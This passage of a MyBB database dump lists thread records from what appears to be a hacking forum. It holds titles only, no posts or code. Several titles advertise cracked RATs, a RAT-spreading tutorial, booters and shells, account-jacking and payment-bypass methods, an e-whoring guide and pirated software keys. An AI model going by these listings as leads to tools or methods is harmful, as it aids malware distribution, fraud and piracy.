`mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('497', '61', '10k+ Proxy List', '0', '0', '0', '82', 'iTzIpod', '1348184132', '2409', '1348184132', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('498', '61', 'Thousands of Private & Public Shells', '0', '0', '0', '82', 'iTzIpod', '1348184444', '2410', '1348184444', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('500', '13', 'PHP vulnerability hunter', '0', '0', '0', '5', 'Timmy', '1348274873', '2437', '1348274873', 'Timmy', '5', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('499', '7', '1 Month', '0', '0', '0', '82', 'iTzIpod', '1348189749', '2411', '1348456861', 'iTzIpod', '82', '8', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('501', '43', 'Visual Studio-Ultimate 2012 serial', '0', '0', '0', '5', 'Timmy', '1348275199', '2441', '1348275199', 'Timmy', '5', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('502', '61', 'Ultimate E-Whoring guide', '0', '0', '0', '172', 'MistaCode', '1348332082', '2458', '1348713334', 'iTzIpod', '82', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('503', '3', 'Ridiculous Downtime and Awards', '0', '0', '0', '1', 't3h jok3r', '1348444173', '2465', '1348518043', 'iTzIpod', '82', '29', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('504', '7', 'Almost there!', '0', '0', '0', '82', 'iTzIpod', '1348460343', '2520', '1348463915', 'Triple H', '4', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('505', '53', 'Complete Java Guide', '0', '0', '0', '4', 'Triple H', '1348460907', '2523', '1349464158', 'Exposé', '222', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('506', '18', '[NEW]T3RMIN8OR\'S B0MB3R[NEW]', '0', '0', '0', '4', 'Triple H', '1348461205', '2525', '1348461205', 'Triple H', '4', '15', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('507', '13', 'New dork on vulnerabilities and view files', '0', '0', '0', '4', 'Triple H', '1348461744', '2527', '1349141630', 't3h jok3r', '1', '22', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('508', '13', 'Awesome deface page source + PSD', '0', '0', '0', '8', 'spacefish36', '1348516579', '2538', '1351657213', 'XxTREYZxX', '257', '50', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('509', '21', 'The world of DDoS Attacks', '0', '0', '0', '8', 'spacefish36', '1348516722', '2539', '1349049514', 'spacefish36', '8', '23', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('510', '19', '[Junk]Rbd\'s Skype Resolver Source', '0', '0', '0', '8', 'spacefish36', '1348517164', '2540', '1348712993', 't3h jok3r', '1', '9', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('511', '5', 'New forums suggestions', '0', '0', '0', '1', 't3h jok3r', '1348523222', '2544', '1348678258', 't3h jok3r', '1', '18', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('512', '30', 'Roadkil.Net´s Tool Collection', '0', '0', '0', '5', 'Timmy', '1348523647', '2545', '1348523647', 'Timmy', '5', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('513', '3', 'The 500 threads celebration thread :)', '0', '0', '0', '5', 'Timmy', '1348523800', '2546', '1348543357', 't3h jok3r', '1', '12', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('514', '9', 'How to make serious money', '0', '0', '0', '82', 'iTzIpod', '1348531264', '2551', '1349264265', 'iTzIpod', '82', '61', '14', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('515', '3', '[Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '0', '0', '82', 'iTzIpod', '1348531835', '2552', '1350354091', 't3h jok3r', '1', '81', '20', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('516', '29', 'RBD\'s Xbox live Jacking Method', '0', '0', '0', '1', 't3h jok3r', '1348533080', '2557', '1348710203', 'Timmy', '5', '24', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('517', '34', 'Spiderman Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1348538865', '2564', '1350157725', 'iTzIpod', '82', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('518', '7', '2,500 Total Forum Posts', '0', '0', '0', '82', 'iTzIpod', '1348538956', '2565', '1348970436', 'iTzIpod', '82', '34', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('519', '15', 'NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '0', '0', '61', 'NXK', '1348539056', '2566', '1348608200', 'NXK', '61', '49', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('520', '34', 'How to make .GIF photos', '0', '0', '0', '82', 'iTzIpod', '1348615310', '2590', '1348617772', 'iTzIpod', '82', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('521', '46', 'Advanced Tabnabbing Tutorial', '0', '0', '0', '5', 'Timmy', '1348617955', '2602', '1348617955', 'Timmy', '5', '12', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('522', '16', '[Free][EBook] How to SE Starbucks', '0', '0', '0', '82', 'iTzIpod', '1348618387', '2607', '1348687140', 'iTzIpod', '82', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('523', '43', 'Windows 8 Pro Keys', '0', '0', '0', '1', 't3h jok3r', '1348679720', '2615', '1350101557', 'mothered', '205', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('524', '63', 'Need signature', '0', '0', '0', '9', 'p420', '1348680037', '2618', '1348687065', 'R?????zo?', '62', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('525', '30', 'Huge Dump of Ebooks', '0', '0', '0', '5', 'Timmy', '1348680913', '2621', '1348687288', 'iTzIpod', '82', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('526', '3', 'New Smilies', '0', '0', '0', '1', 't3h jok3r', '1348708006', '2637', '1348961892', 't3h jok3r', '1', '34', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('527', '47', 'Get my private free ebay items ebook and more', '0', '0', '0', '4', 'Triple H', '1348712689', '2652', '1348795705', 'Triple H', '4', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('528', '7', '[Milestone] Reached 700 posts', '0', '0', '0', '82', 'iTzIpod', '1348712742', '2653', '1348921158', 'iTzIpod', '82', '16', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('529', '49', '[Suggestion] A or B Section', '0', '0', '0', '82', 'iTzIpod', '1348713831', '2660', '1349147406', 't3h jok3r', '1', '21', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('530', '48', 'Link colors', '0', '0', '0', '1', 't3h jok3r', '1348714286', '2664', '1348788888', 't3h jok3r', '1', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('531', '4', 'Hello', '0', '0', '0', '199', 'Anonymous™', '1348716475', '2667', '1348788438', 't3h jok3r', '1', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('532', '23', 'Think you have an infection? Click Here.', '0', '0', '0', '199', 'Anonymous™', '1348716819', '2668', '1351112848', 'R?????zo?', '62', '34', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('533', '23', 'How to Avoid JDB\'s', '0', '0', '0', '199', 'Anonymous™', '1348717325', '2669', '1348795406', 't3h jok3r', '1', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('534', '23', 'Manually Removing Viruses Through System Registry', '0', '0', '0', '199', 'Anonymous™', '1348719363', '2670', '1349320171', 'Romdu62', '7', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('535', '14', 'Proxy list', '0', '0', '0', '199', 'Anonymous™', '1348761020', '2677', '1348891912', 'Timmy', '5', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('536', '4', 'Hey everyone!', '0', '0', '0', '200', 'Poptart', '1348794230', '2686', '1348891314', 'Timmy', '5', '15', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('537', '12', '[Very Hot!] How to bypass online shop payment! [Video]', '0', '0', '0', '4', 'Triple H', '1348795938', '2710', '1348888827', 'Apathy', '2', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('538', '63', 'Staff userbar', '0', '0', '0', '61', 'NXK', '1348851804', '2732', '1348888359', 't3h jok3r', '1', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('539', '4', 'YO WHAT UP!', '0', '2', '0', '203', 'NeonLights', '1348859969', '2736', '1349143929', 't3h jok3r', '1', '54', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('540', '15', 'Collection Of Booters and Shells', '0', '19', '0', '203', 'NeonLights', '1348861770', '2739', '1348861770', 'NeonLights', '203', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('541', '21', '[INFO] what is a botnet/RAT? complete explanation', '0', '0', '0', '203', 'NeonLights', '1348861860', '2740', '1348861860', 'NeonLights', '203', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('800', '15', 'Blackshades v5.3 Cracked By The Old Warrior', '0', '0', '0', '203', 'NeonLights', '1349887315', '4159', '1352530926', 'Timmy', '5', '37', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('801', '7', '[IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '0', '0', '100', '??zg???g????61', '1349909362', '4177', '1349954251', 'sirchamp', '53', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('544', '12', '[Tutorial] Epic RAT Spreading Guide | Detailed Methods', '0', '0', '0', '203', 'NeonLights', '1348862068', '2743', '1348862068', 'NeonLights', '203', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('798', '15', 'Xtreme Rat 3.5 Cracked', '0', '0', '0', '203', 'NeonLights', '1349887149', '4157', '1350752171', 't3h jok3r', '1', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('546', '15', 'OverTheRainbow\'s ProxyScanner v1.2', '0', '19', '0', '203', 'NeonLights', '1348862219', '2745', '1349234998', 'spacefish36', '8', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('547', '19', '[Junk][Junk]Closed by neon', '0', '0', '0', '203', 'NeonLights', '1348862436', '2746', '1348872759', 'NXK', '61', '18', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('550', '61', '[Method] 10,000 views a day', '0', '0', '0', '82', 'iTzIpod', '1348868820', '2758', '1348868820', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('548', '15', '{Dual APIs and 227 Shells} [HOT] SuperBooter [PMs] [LONG BOOT TIMES] # [API + SHELLS]', '0', '2', '0', '203', 'NeonLights', '1348863073', '2747', '1348863073', 'NeonLights', '203', '22', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('549', '35', 'HQ Thread Design', '0', '0', '0', '82', 'iTzIpod', '1348868557', '2756', '1348868557', 'iTzIpod', '82', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('551', '61', 'Dexter\'s Thread Design', '0', '0', '0', '82', 'iTzIpod', '1348868901', '2759', '1348920875', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('552', '61', 'Bunch of eBooks', '0', '0', '0', '82', 'iTzIpod', '1348869024', '2760', '1348869024', 'iTzIpod', '82', 